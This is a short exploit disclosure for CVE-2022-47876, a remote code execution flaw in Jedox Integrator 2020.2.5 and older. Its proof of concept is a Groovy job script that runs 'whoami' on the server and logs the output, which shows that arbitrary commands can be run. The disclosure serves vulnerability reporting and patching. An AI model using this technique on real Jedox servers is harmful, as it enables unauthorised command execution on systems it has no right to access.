# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts # Date: 28/04/2023 # Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47876 Introduction ================= Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs: def sout = new StringBuilder(), serr = new StringBuilder() def proc = 'whoami'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(10000) LOG.error(sout.toString()); LOG.error(serr.toString());